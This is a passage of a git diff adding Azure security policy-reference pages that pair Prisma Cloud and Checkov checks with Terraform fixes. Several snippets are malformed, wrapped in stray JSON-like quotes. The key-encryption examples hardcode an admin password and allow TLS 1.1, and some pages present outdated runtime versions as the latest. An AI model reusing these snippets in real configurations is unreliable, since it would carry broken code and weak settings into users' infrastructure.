Under Setting section, Click on 'Identity'. + +. 
Ensure that 'Status' is set to 'On'.
+////
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* azurerm_app_service
+* *Arguments:* identity.type
+
+
+[source,go]
+----
+resource "azurerm_app_service" "example" {
+  ...
+
+  identity {
+    type = "SystemAssigned"
+  }
+}
+----
diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-mariadb-server-enables-geo-redundant-backups.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-mariadb-server-enables-geo-redundant-backups.adoc
new file mode 100644
index 000000000..7c14e00bb
--- /dev/null
+++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-mariadb-server-enables-geo-redundant-backups.adoc
@@ -0,0 +1,85 @@
+== MariaDB server does not enable geo-redundant backups
+// MariaDB server geo-redundant backups not enabled
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 2bd10e93-cbe7-4224-98bd-6fb5472d5418
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/MariaDBGeoBackupEnabled.py[CKV_AZURE_129]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+//,Run
+
+|Frameworks
+|Terraform,TerraformPlan
+
+|===
+
+
+
+=== Description
+
+
+Ensure that your Microsoft Azure MariaDB database servers have geo-redundant backups enabled, to allow you to restore your MariaDB servers to a different Azure region in the event of a regional outage or a disaster.
+Geo-restore is the default recovery option when your MariaDB database server is unavailable because a large-scale incident, such as a natural disaster, occurs in the region where the database server is hosted.
+
+During geo-restore, the MariaDB server configuration can be changed.
+These configuration changes include compute generation, vCore, backup retention period, and backup redundancy options.
+////
+=== Fix - Runtime
+*In Azure console*
+
+
+.
Sign in to *Azure Management Console*.
+
+. Navigate to the *All resources* blade at https://portal.azure.com/#blade/HubsExtension/BrowseAll to access all your Microsoft Azure resources.
+
+. From the Type filter box, select Azure Database for MariaDB server to list the MariaDB servers provisioned within your Azure account.
+
+. Click on the name of the MariaDB database server that you want to examine.
+
+. In the navigation panel, under Settings, select Pricing tier to access the pricing tier settings available for the selected MariaDB server.
+
+. On the Pricing tier page, in the Backup Redundancy Options section, check the backup redundancy tier configured for the database server.
++
+If the selected tier is Locally Redundant, the data can be recovered from within the current region only; therefore, the Geo-Redundant backup feature is not enabled for the selected Microsoft Azure MariaDB database server.
+
+. Repeat steps no. 4 -- 6 for each MariaDB database server available in the current Azure subscription.
+
+. Repeat steps no. 3 -- 7 for each subscription created in your Microsoft Azure cloud account.
+////
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* azurerm_mariadb_server
+* *Arguments:* geo_redundant_backup_enabled
+
+
+[source,go]
+----
+resource "azurerm_mariadb_server" "example" {
+  ...
++ geo_redundant_backup_enabled = true
+}
+----
diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-microsoft-antimalware-is-configured-to-automatically-updates-for-virtual-machines.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-microsoft-antimalware-is-configured-to-automatically-updates-for-virtual-machines.adoc
new file mode 100644
index 000000000..8ea55f314
--- /dev/null
+++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-microsoft-antimalware-is-configured-to-automatically-updates-for-virtual-machines.adoc
@@ -0,0 +1,73 @@
+== Microsoft Antimalware is not configured to automatically update Virtual Machines
+// Microsoft Antimalware not configured to automatically update Virtual Machines
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 1a58fc83-8975-442f-8448-ec3f00893de8
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureAntimalwareIsConfiguredWithAutoUpdatesForVMs.yaml[CKV2_AZURE_10]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Terraform,TerraformPlan
+
+|===
+
+
+
+=== Description
+
+
+This policy audits any Windows virtual machine not configured with automatic update of Microsoft Antimalware protection signatures.
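+
+Signature updates are delivered through the IaaSAntimalware virtual machine extension shown in the fix that follows. As an additional sketch, the extension can also carry an antimalware configuration in its settings payload; the JSON keys here are assumptions based on the extension's published schema, not part of this policy.
+
+[source,go]
+----
+# Illustrative only: antimalware configuration passed via the extension settings
+resource "azurerm_virtual_machine_extension" "antimalware" {
+  name                       = "IaaSAntimalware"
+  virtual_machine_id         = azurerm_virtual_machine.example.id
+  publisher                  = "Microsoft.Azure.Security"
+  type                       = "IaaSAntimalware"
+  type_handler_version       = "2.0"
+  auto_upgrade_minor_version = true
+
+  # Assumed settings keys; consult the extension's schema before relying on them
+  settings = jsonencode({
+    AntimalwareEnabled        = true
+    RealtimeProtectionEnabled = "true"
+  })
+}
+----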
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* azurerm_virtual_machine, azurerm_virtual_machine_extension
+* *Arguments:* virtual_machine_id (of *azurerm_virtual_machine_extension*)
+
+
+[source,go]
+----
+resource "azurerm_virtual_machine" "virtual_machine_good_1" {
+  name                  = "acctvm"
+  location              = "location"
+  resource_group_name   = "group"
+  network_interface_ids = ["id"]
+  vm_size               = "Standard_F2"
+  storage_os_disk {
+    name          = "myosdisk1"
+    caching       = "ReadWrite"
+    create_option = "FromImage"
+  }
+}
+
+
+resource "azurerm_virtual_machine_extension" "extension_good_1" {
+  name                       = "hostname"
++ virtual_machine_id         = azurerm_virtual_machine.virtual_machine_good_1.id
+  publisher                  = "Microsoft.Azure.Security"
+  type                       = "IaaSAntimalware"
+  type_handler_version       = "2.0"
+  auto_upgrade_minor_version = true
+}
+----
diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-my-sql-server-enables-geo-redundant-backups.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-my-sql-server-enables-geo-redundant-backups.adoc
new file mode 100644
index 000000000..5e1bfad29
--- /dev/null
+++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-my-sql-server-enables-geo-redundant-backups.adoc
@@ -0,0 +1,85 @@
+== MySQL server does not enable geo-redundant backups
+// MySQL server geo-redundant backups disabled
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 3e47b7e8-5bd9-4b23-8d8e-90ed96249654
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/MySQLGeoBackupEnabled.py[CKV_AZURE_94]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+//,Runtime
+
+|Frameworks
+|Terraform,TerraformPlan
+
+|===
+
+
+
+=== Description
+
+
+Ensure that your Microsoft Azure MySQL database servers have geo-redundant backups enabled, to allow you to restore your MySQL servers to a different Azure region in the event of a regional outage or a disaster.
+Geo-restore is the default recovery option when your MySQL database server is unavailable because a large-scale incident, such as a natural disaster, occurs in the region where the database server is hosted.
+
+During geo-restore, the MySQL server configuration can be changed.
+These configuration changes include compute generation, vCore, backup retention period, and backup redundancy options.
+////
+=== Fix - Runtime
+*In Azure console*
+
+
+. Sign in to *Azure Management Console*.
+
+. Navigate to the *All resources* blade at https://portal.azure.com/#blade/HubsExtension/BrowseAll to access all your Microsoft Azure resources.
+
+. From the Type filter box, select Azure Database for MySQL server to list the MySQL servers provisioned within your Azure account.
+
+. Click on the name of the MySQL database server that you want to examine.
+
+. In the navigation panel, under Settings, select Pricing tier to access the pricing tier settings available for the selected MySQL server.
+
+. On the Pricing tier page, in the Backup Redundancy Options section, check the backup redundancy tier configured for the database server.
++
+If the selected tier is Locally Redundant, the data can be recovered from within the current region only; therefore, the Geo-Redundant backup feature is not enabled for the selected Microsoft Azure MySQL database server.
+
+. Repeat steps no. 4 -- 6 for each MySQL database server available in the current Azure subscription.
+
+. Repeat steps no. 3 -- 7 for each subscription created in your Microsoft Azure cloud account.
+////
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* azurerm_mysql_server
+* *Arguments:* geo_redundant_backup_enabled
+
+
+[source,go]
+----
+resource "azurerm_mysql_server" "example" {
+  ...
++ geo_redundant_backup_enabled = true
+}
+----
diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-my-sql-server-enables-threat-detection-policy.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-my-sql-server-enables-threat-detection-policy.adoc
new file mode 100644
index 000000000..cb80c8e82
--- /dev/null
+++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-my-sql-server-enables-threat-detection-policy.adoc
@@ -0,0 +1,55 @@
+== MySQL server does not enable Threat Detection policy
+// MySQL server Threat Detection policy disabled
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| a2c15b15-6ca3-4c3f-a4de-923ff60abd26
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/MySQLTreatDetectionEnabled.py[CKV_AZURE_127]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Terraform,TerraformPlan
+
+|===
+
+
+
+=== Description
+
+
+Enable Advanced Threat Detection on your non-Basic tier Azure database for MySQL servers to detect anomalous activities indicating unusual and potentially harmful attempts to access or exploit databases.
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* azurerm_mysql_server
+* *Arguments:* threat_detection_policy.enabled
+
+
+[source,text]
+----
+{
+ "resource "azurerm_mysql_server" "example" {
+ ...
++ threat_detection_policy { ++ enabled = true + } + + }", +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-mysql-server-enables-customer-managed-key-for-encryption.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-mysql-server-enables-customer-managed-key-for-encryption.adoc new file mode 100644 index 000000000..601b0d8a6 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-mysql-server-enables-customer-managed-key-for-encryption.adoc @@ -0,0 +1,122 @@ +== MySQL server does not enable customer-managed key for encryption +// MySQL server customer-managed key for encryption disabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| e0fb57de-942d-4e6e-b9df-3342c415bc21 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/MSQLenablesCustomerManagedKey.yaml[CKV2_AZURE_16] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Use customer-managed keys to manage the encryption at rest of your MySQL servers. +By default, the data is encrypted at rest with service-managed keys, but customer-managed keys are commonly required to meet regulatory compliance standards. +Customer-managed keys enable the data to be encrypted with an Azure Key Vault key created and owned by you. +You have full control and responsibility for the key lifecycle, including rotation and management. 
+ +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_resource_group,azurerm_key_vault, azurerm_key_vault_access_policy, azurerm_key_vault_key, azurerm_mysql_server, azurerm_mysql_server_key + + +[source,go] +---- +{ + "resource "azurerm_resource_group" "ok" { + name = "ok-resources" + location = "West Europe" +} + + +resource "azurerm_key_vault" "ok" { + name = "okkv" + location = azurerm_resource_group.ok.location + resource_group_name = azurerm_resource_group.ok.name + tenant_id = data.azurerm_client_config.current.tenant_id + sku_name = "premium" + purge_protection_enabled = true +} + + +resource "azurerm_key_vault_access_policy" "server" { + key_vault_id = azurerm_key_vault.ok.id + tenant_id = data.azurerm_client_config.current.tenant_id + object_id = azurerm_mysql_server.ok.identity.0.principal_id + key_permissions = ["get", "unwrapkey", "wrapkey"] + secret_permissions = ["get"] +} + + +resource "azurerm_key_vault_access_policy" "client" { + key_vault_id = azurerm_key_vault.ok.id + tenant_id = data.azurerm_client_config.current.tenant_id + object_id = data.azurerm_client_config.current.object_id + key_permissions = ["get", "create", "delete", "list", "restore", "recover", "unwrapkey", "wrapkey", "purge", "encrypt", "decrypt", "sign", "verify"] + secret_permissions = ["get"] +} + + +resource "azurerm_key_vault_key" "ok" { + name = "tfex-key" + key_vault_id = azurerm_key_vault.ok.id + key_type = "RSA" + key_size = 2048 + key_opts = ["decrypt", "encrypt", "sign", "unwrapKey", "verify", "wrapKey"] + depends_on = [ + azurerm_key_vault_access_policy.client, + azurerm_key_vault_access_policy.server, + ] +} + + +resource "azurerm_mysql_server" "ok" { + name = "ok-mysql-server" + location = azurerm_resource_group.ok.location + resource_group_name = azurerm_resource_group.ok.name + sku_name = "GP_Gen5_2" + administrator_login = "acctestun" + administrator_login_password = "H@Sh1CoR3!" 
+ ssl_enforcement_enabled = true + ssl_minimal_tls_version_enforced = "TLS1_1" + storage_mb = 51200 + version = "5.6" + + identity { + type = "SystemAssigned" + } + +} + +resource "azurerm_mysql_server_key" "ok" { + server_id = azurerm_mysql_server.ok.id + key_vault_key_id = azurerm_key_vault_key.ok.id +} + + +", +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-net-framework-version-is-the-latest-if-used-as-a-part-of-the-web-app.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-net-framework-version-is-the-latest-if-used-as-a-part-of-the-web-app.adoc new file mode 100644 index 000000000..d674b885e --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-net-framework-version-is-the-latest-if-used-as-a-part-of-the-web-app.adoc @@ -0,0 +1,59 @@ +== Azure App Service Web app doesn't use latest .Net framework version +// Azure App Service Web app does not use latest version of .Net framework + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 881b44d4-4284-4ac4-896a-d8e45d38a584 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AppServiceDotnetFrameworkVersion.py[CKV_AZURE_80] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Azure App Service web applications developed with the .NET software stack should use the latest available version of .NET to ensure the latest security fixes are in use. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_app_service +* *Arguments:* dotnet_framework_version - (Optional) The version of the .net framework's CLR used in this App Service. 
+
+Possible values are v2.0 (which will use the latest version of the .net framework for the .net CLR v2 - currently .net 3.5), v4.0 (which corresponds to the latest version of the .net CLR v4 - which at the time of writing is .net 4.7.1) and v5.0.
+
+
+[source,go]
+----
+resource "azurerm_app_service" "example" {
+  ...
+  site_config {
++   dotnet_framework_version = "v4.0"
+    ...
+  }
+}
+----
diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-php-version-is-the-latest-if-used-to-run-the-web-app.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-php-version-is-the-latest-if-used-to-run-the-web-app.adoc
new file mode 100644
index 000000000..12dc31f04
--- /dev/null
+++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-php-version-is-the-latest-if-used-to-run-the-web-app.adoc
@@ -0,0 +1,57 @@
+== Azure App Service Web app does not use latest PHP version
+// Azure App Service Web app does not use latest version of PHP
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 4402aa89-9823-4858-ae66-e4dfbab33bcc
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AppServicePHPVersion.py[CKV_AZURE_81]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Terraform,TerraformPlan
+
+|===
+
+
+
+=== Description
+
+
+Azure App Service web applications developed with PHP should use the latest available version of PHP to ensure the latest security fixes are in use.
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* azurerm_app_service
+* *Arguments:* php_version - (Optional) The version of PHP to use in this App Service.
+
+Possible values are 5.5, 5.6, 7.0, 7.1, 7.2, 7.3 and 7.4.
+
+
+[source,go]
+----
+resource "azurerm_app_service" "example" {
+  ...
++ site_config {
++   php_version = "7.4"
++ }
+}
+----
diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-postgresql-server-enables-customer-managed-key-for-encryption.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-postgresql-server-enables-customer-managed-key-for-encryption.adoc
new file mode 100644
index 000000000..939911ce3
--- /dev/null
+++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-postgresql-server-enables-customer-managed-key-for-encryption.adoc
@@ -0,0 +1,122 @@
+== PostgreSQL server does not enable customer-managed key for encryption
+// PostgreSQL server's customer-managed key for encryption disabled
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 4e6e26f4-c923-4eed-b947-2646f6d677d2
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/PGSQLenablesCustomerManagedKey.yaml[CKV2_AZURE_17]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+// ,Run
+
+|Frameworks
+|Terraform,TerraformPlan
+
+|===
+
+
+
+=== Description
+
+
+Use customer-managed keys to manage the encryption at rest of your PostgreSQL servers.
+By default, the data is encrypted at rest with service-managed keys, but customer-managed keys are commonly required to meet regulatory compliance standards.
+Customer-managed keys enable the data to be encrypted with an Azure Key Vault key created and owned by you.
+You have full control and responsibility for the key lifecycle, including rotation and management.
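+
+Because you own the key lifecycle, rotation can be automated on the Key Vault key itself. This is a sketch only; the rotation_policy block requires a sufficiently recent azurerm provider, and the intervals shown are illustrative assumptions rather than part of this policy.
+
+[source,go]
+----
+# Illustrative only: automatic rotation for a customer-managed key
+resource "azurerm_key_vault_key" "example" {
+  name         = "tfex-key"
+  key_vault_id = azurerm_key_vault.example.id
+  key_type     = "RSA"
+  key_size     = 2048
+  key_opts     = ["decrypt", "encrypt", "sign", "unwrapKey", "verify", "wrapKey"]
+
+  # Rotate 30 days before expiry; intervals are ISO 8601 durations
+  rotation_policy {
+    automatic {
+      time_before_expiry = "P30D"
+    }
+    expire_after         = "P90D"
+    notify_before_expiry = "P29D"
+  }
+}
+----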
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* azurerm_resource_group, azurerm_key_vault, azurerm_key_vault_access_policy, azurerm_key_vault_key, azurerm_postgresql_server, azurerm_postgresql_server_key
+
+
+[source,go]
+----
+resource "azurerm_resource_group" "ok" {
+  name     = "ok-resources"
+  location = "West Europe"
+}
+
+
+resource "azurerm_key_vault" "ok" {
+  name                     = "okkv"
+  location                 = azurerm_resource_group.ok.location
+  resource_group_name      = azurerm_resource_group.ok.name
+  tenant_id                = data.azurerm_client_config.current.tenant_id
+  sku_name                 = "premium"
+  purge_protection_enabled = true
+}
+
+
+resource "azurerm_key_vault_access_policy" "server" {
+  key_vault_id       = azurerm_key_vault.ok.id
+  tenant_id          = data.azurerm_client_config.current.tenant_id
+  object_id          = azurerm_postgresql_server.ok.identity.0.principal_id
+  key_permissions    = ["get", "unwrapkey", "wrapkey"]
+  secret_permissions = ["get"]
+}
+
+
+resource "azurerm_key_vault_access_policy" "client" {
+  key_vault_id       = azurerm_key_vault.ok.id
+  tenant_id          = data.azurerm_client_config.current.tenant_id
+  object_id          = data.azurerm_client_config.current.object_id
+  key_permissions    = ["get", "create", "delete", "list", "restore", "recover", "unwrapkey", "wrapkey", "purge", "encrypt", "decrypt", "sign", "verify"]
+  secret_permissions = ["get"]
+}
+
+
+resource "azurerm_key_vault_key" "ok" {
+  name         = "tfex-key"
+  key_vault_id = azurerm_key_vault.ok.id
+  key_type     = "RSA"
+  key_size     = 2048
+  key_opts     = ["decrypt", "encrypt", "sign", "unwrapKey", "verify", "wrapKey"]
+  depends_on = [
+    azurerm_key_vault_access_policy.client,
+    azurerm_key_vault_access_policy.server,
+  ]
+}
+
+
+resource "azurerm_postgresql_server" "ok" {
+  name                             = "ok-pg-server"
+  location                         = azurerm_resource_group.ok.location
+  resource_group_name              = azurerm_resource_group.ok.name
+  sku_name                         = "GP_Gen5_2"
+  administrator_login              = "acctestun"
+  administrator_login_password     = "H@Sh1CoR3!"
+  ssl_enforcement_enabled          = true
+  ssl_minimal_tls_version_enforced = "TLS1_1"
+  storage_mb                       = 51200
+  version                          = "11"
+
+  identity {
+    type = "SystemAssigned"
+  }
+}
+
+resource "azurerm_postgresql_server_key" "ok" {
+  server_id        = azurerm_postgresql_server.ok.id
+  key_vault_key_id = azurerm_key_vault_key.ok.id
+}
+----
diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-postgresql-server-enables-geo-redundant-backups.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-postgresql-server-enables-geo-redundant-backups.adoc
new file mode 100644
index 000000000..3fb1910f1
--- /dev/null
+++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-postgresql-server-enables-geo-redundant-backups.adoc
@@ -0,0 +1,56 @@
+== PostgreSQL server does not enable geo-redundant backups
+// PostgreSQL server geo-redundant backup disabled
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 28bac534-b4d1-464d-8ad9-3ed011d53f32
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/PostgressSQLGeoBackupEnabled.py[CKV_AZURE_102]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Terraform,TerraformPlan
+
+|===
+
+
+
+=== Description
+
+
+Azure PostgreSQL allows you to choose between locally redundant or geo-redundant backup storage in the General Purpose and Memory Optimized tiers.
+When the backups are stored in geo-redundant backup storage, they are not only stored within the region in which your server is hosted, but are also replicated to a paired data center.
+This provides better protection and the ability to restore your server in a different region in the event of a disaster.
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* azurerm_postgresql_server
+* *Arguments:* geo_redundant_backup_enabled - (Optional) Turn Geo-redundant server backups on/off.
+
+
+[source,go]
+----
+resource "azurerm_postgresql_server" "example" {
+  ...
++ geo_redundant_backup_enabled = true
+}
+----
diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-postgresql-server-enables-infrastructure-encryption-1.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-postgresql-server-enables-infrastructure-encryption-1.adoc
new file mode 100644
index 000000000..7bcafb674
--- /dev/null
+++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-postgresql-server-enables-infrastructure-encryption-1.adoc
@@ -0,0 +1,54 @@
+== MySQL server does not enable infrastructure encryption
+// MySQL server infrastructure encryption disabled
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| a2afadb2-7c9d-4445-bc3b-2304774ca62e
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/MySQLEncryptionEnaled.py[CKV_AZURE_96]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Terraform, TerraformPlan
+
+|===
+
+
+
+=== Description
+
+
+Enable infrastructure encryption for Azure Database for MySQL servers to have a higher level of assurance that the data is secure.
+When infrastructure encryption is enabled, the data at rest is encrypted twice using FIPS 140-2 compliant Microsoft managed keys.
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* azurerm_mysql_server
+* *Arguments:* infrastructure_encryption_enabled
+
+
+[source,go]
+----
+{
+ "resource "azurerm_mysql_server" "example" {
+ ...
++ infrastructure_encryption_enabled = true +}", + +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-postgresql-server-enables-infrastructure-encryption.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-postgresql-server-enables-infrastructure-encryption.adoc new file mode 100644 index 000000000..260f1897c --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-postgresql-server-enables-infrastructure-encryption.adoc @@ -0,0 +1,54 @@ +== PostgreSQL server does not enable infrastructure encryption +// PostgreSQL server infrastructure encryption disabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| c6c340a1-e862-4d18-b031-5d12a6ab90b1 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/PostgreSQLEncryptionEnabled.py[CKV_AZURE_130] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Enable infrastructure encryption for Azure Database for PostgreSQL servers to have higher level of assurance that the data is secure. +When infrastructure encryption is enabled, the data at rest is encrypted twice using FIPS 140-2 compliant Microsoft managed keys. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_postgresql_server +* *Arguments:* infrastructure_encryption_enabled + + +[source,go] +---- +{ + " resource "azurerm_postgresql_server" "example" { + ... 
++ infrastructure_encryption_enabled = true + }", + +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-postgresql-server-enables-threat-detection-policy.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-postgresql-server-enables-threat-detection-policy.adoc new file mode 100644 index 000000000..915dad422 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-postgresql-server-enables-threat-detection-policy.adoc @@ -0,0 +1,55 @@ +== PostgreSQL server does not enable Threat Detection policy +// PostgreSQL server Threat Detection policy disabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 736b5486-73e5-4d65-a695-24071db8602a + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/PostgresSQLTreatDetectionEnabled.py[CKV_AZURE_128] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Enable Advanced Threat Detection on your non-Basic tier Azure database for PostgreSQL servers to detect anomalous activities indicating unusual and potentially harmful attempts to access or exploit databases. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_postgresql_server +* *Arguments:* threat_detection_policy.enabled + + +[source,go] +---- +{ + "resource "azurerm_postgresql_server" "example" { + ... 
++ threat_detection_policy {
++ enabled = true
+ }
+
+ }",
+}
+----
diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-python-version-is-the-latest-if-used-to-run-the-web-app.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-python-version-is-the-latest-if-used-to-run-the-web-app.adoc
new file mode 100644
index 000000000..79e222739
--- /dev/null
+++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-python-version-is-the-latest-if-used-to-run-the-web-app.adoc
@@ -0,0 +1,57 @@
+== Azure App Service Web app does not use latest Python version
+// Azure App Service Web app uses outdated Python version
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| df25ef8c-da56-49f6-b2af-c90d9da01b45
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AppServicePythonVersion.py[CKV_AZURE_82]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Terraform,TerraformPlan
+
+|===
+
+
+
+=== Description
+
+
+Azure App Service web applications developed with Python should use the latest available version of Python to ensure the latest security fixes are in use.
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* azurerm_app_service
+* *Arguments:* python_version - (Optional) The version of Python to use in this App Service.
+
+Possible values are 2.7 and 3.4.
+
+
+[source,go]
+----
+resource "azurerm_app_service" "example" {
+  ...
++ site_config {
++   python_version = "3.4"
++ }
+}
+----
diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-remote-debugging-is-not-enabled-for-app-services.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-remote-debugging-is-not-enabled-for-app-services.adoc
new file mode 100644
index 000000000..cc0ed71bd
--- /dev/null
+++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-remote-debugging-is-not-enabled-for-app-services.adoc
@@ -0,0 +1,57 @@
+== Azure App Services Remote debugging is enabled
+// Azure App Services Remote debugging enabled
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 6fd5eaee-2e6d-419b-b380-2fa1a67feaf3
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/RemoteDebggingNotEnabled.py[CKV_AZURE_72]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+//, Run
+
+|Frameworks
+|Terraform,TerraformPlan
+
+|===
+
+
+
+=== Description
+
+
+Remote debugging allows you to remotely connect to a running app and debug it from a different location.
+While this can be useful for developers who need to troubleshoot issues with their app, it also introduces a potential security risk because it allows someone to remotely access your app and potentially modify its code or behavior.
+If remote debugging is enabled for your app services, it could potentially be exploited by an attacker to gain unauthorized access to your app and potentially compromise it.
+This could result in data loss, financial damage, or other negative consequences.
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* azurerm_app_service
+* *Arguments:* remote_debugging_enabled
+
+
+[source,go]
+----
+{
+ "resource "azurerm_app_service" "example" {
+ ...
